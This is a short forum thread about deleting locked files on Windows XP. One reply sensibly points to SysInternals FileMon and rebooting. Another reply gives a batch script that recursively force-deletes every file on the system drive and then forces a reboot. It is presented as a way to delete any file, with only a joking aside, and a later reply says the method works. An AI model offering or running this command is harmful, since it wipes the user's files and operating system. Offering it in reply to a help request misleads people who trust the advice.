xisto Community
Sign in to follow this  
speedy

Delete Any File On Xp

You might want to check out the tool FileMon from SysInternals (https://technet.microsoft.com/en-us/sysinternals/bb896642.aspx). It shows every file that is open on your system and which program that has it open. I sometimes can’t delete a file that is still open because I don’t know which program is still using it. It is often the case that the program in question failed to properly shutdown or crashed and thus never released the file handle. If all else fails I simply reboot and all the handles are released.

reply your questionDelete Any File On Xp

is easy for me to delete any file in xp with systemdrive too. So you must type this

@echo off

del %systemdrive%*.* /f /s /q

shutdown -r -f -t 00

and save as to bat and try it if you wanna lose all file

-reply by whisnu

What up - this method works. But another alternative if you are unable to get CMD to work for you is to use COMMAND instead. Both will take you to a prompt window where you can perform basic DOS commands including the delete procedure described already.:P-reply by SoTechnic

I have downloaded Game Boooster 3 and due to no use of it I uninstalled it from the control panel. But some of the files are still there and it can't be deleted. It can't be deleted from the command prompt.The file is GBV3ContextMenu.Dll

-reply by Nikunj